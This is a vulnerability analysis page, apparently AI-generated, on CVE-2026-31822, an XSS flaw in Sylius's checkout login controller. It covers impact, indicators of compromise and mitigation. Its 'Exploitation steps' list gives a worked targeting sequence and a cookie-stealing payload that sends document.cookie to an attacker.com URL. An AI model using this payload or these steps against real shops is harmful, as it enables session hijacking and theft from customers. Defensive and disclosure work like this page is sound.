CVE-2026-31822: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-31822 is a Cross-Site Scripting (XSS) vulnerability in the Sylius open-source eCommerce Framework (built on Symfony) affecting the shop checkout login form. The flaw exists in the ApiLoginController Stimulus controller, where failed login responses are rendered into the DOM via innerHTML without sanitization. It affects Sylius versions 2.0.0–2.0.15, 2.1.0–2.1.11, and 2.2.0–2.2.2, and was disclosed on March 9, 2026, with patches released the same day. The vulnerability carries a CVSS v3.1 score of 6.1 (Medium) and a CVSS v4.0 score of 5.3 (Medium) (GitHub Advisory, Sylius Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the use of innerHTML to render the message field from the AuthenticationFailureHandler JSON response in ApiLoginController.js. In the default configuration, the message originates from AuthenticationException::getMessageKey() passed through Symfony's translator, which returns a hardcoded string — limiting direct exploitability. However, the risk escalates in scenarios where: (1) a custom AuthenticationFailureHandler includes user-supplied data in the message, (2) translation files are sourced from an untrusted CMS or database, (3) a man-in-the-middle attacker intercepts and modifies the HTTP response, or (4) middleware/reverse proxies inject content into the JSON response body. The fix replaces innerHTML assignment with textContent to prevent HTML/JavaScript parsing (Sylius Advisory, GitHub Advisory).

Impact

Successful exploitation can lead to session hijacking, credential theft, cart/order manipulation, and phishing attacks executed within the trusted shop domain. An attacker who can influence the authentication failure message — through a customized handler, compromised translation source, or network interception — can inject arbitrary JavaScript that executes in the victim's browser during a checkout login attempt. Availability is not impacted, but confidentiality and integrity of the subsequent (browser) system are both rated Low under CVSS v4.0 (GitHub Advisory, Sylius Advisory).

Exploitability

There is no known public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.05% (16th percentile), indicating a low near-term exploitation probability. Exploitation requires passive user interaction (a victim must attempt to log in at the checkout page) and is most realistic in non-default configurations or under network interception conditions.

Exploitation steps

  1. Identify target: Locate a Sylius-based eCommerce site running an affected version (2.0.0–2.0.15, 2.1.0–2.1.11, or 2.2.0–2.2.2) with the default checkout login form enabled.
  2. Determine attack vector: Assess whether the target uses a customized AuthenticationFailureHandler that echoes user-supplied input (e.g., username) in the error message, or whether the site is accessible over HTTP (enabling MitM), or uses a CMS-backed translation system.
  3. Craft malicious payload: Prepare a JavaScript payload to be injected into the message field of the authentication failure JSON response, e.g.: {"success": false, "message": "<img src=x onerror=document.location='https://attacker.com/steal?c='+document.cookie>"}.
  4. Trigger injection: Depending on the vector — submit a login attempt with a username that gets reflected in the error message (custom handler), or intercept the HTTPS/HTTP response and replace the message field with the malicious payload (MitM).
  5. Victim interaction: Wait for a legitimate user to attempt login at the checkout page; the ApiLoginController.js renders the tampered message via innerHTML, executing the injected script in the victim's browser.
  6. Harvest data: The executed script exfiltrates session cookies, credentials, or performs actions (e.g., order manipulation) on behalf of the authenticated user (Sylius Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from a user's browser to external domains during or after a failed checkout login attempt; unusual GET/POST requests to attacker-controlled URLs containing encoded cookie or session data.
  • Logs: Web server access logs showing failed POST requests to the Sylius checkout login endpoint (/shop/login-check or equivalent) followed by unusual redirects or resource loads to external domains in the same session.
  • Browser/Client-Side: JavaScript errors or unexpected network requests visible in browser developer tools during a failed login at the checkout page; DOM modifications in the login error element containing HTML tags rather than plain text.
  • Application: Authentication failure responses containing HTML markup or <script> tags in the message field of the JSON response body, detectable via WAF or API gateway logging (Sylius Advisory).

Mitigation and workarounds

Upgrade Sylius to the patched versions: 2.0.16, 2.1.12, or 2.2.3 (or later). For installations that cannot be immediately upgraded, a workaround is available: override ApiLoginController.js by copying it from vendor/sylius/sylius/.../ApiLoginController.js to assets/shop/controllers/ApiLoginController.js and replacing errorElement.innerHtml = response.message with errorElement.textContent = response.message. For Sylius 2.1+, disable the vendor controller in controllers.json and register the patched version in bootstrap.js; for Sylius 2.0, use Webpack's NormalModuleReplacementPlugin to swap the controller at build time, then rebuild assets with yarn encore production. Additionally, ensure authentication failure messages do not include user-supplied input, and serve the application over HTTPS to mitigate MitM attack vectors (Sylius Advisory, GitHub Advisory).

Community reactions

The vulnerability was responsibly disclosed by Bartłomiej Nowiński (@bnBart) and acknowledged by the Sylius security team, who published a detailed advisory with workaround instructions on March 9, 2026. Sylius also published a security blog post covering the issue (Sylius Blog). No significant broader media coverage or notable community controversy has been observed beyond standard vulnerability tracking and advisory aggregation.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management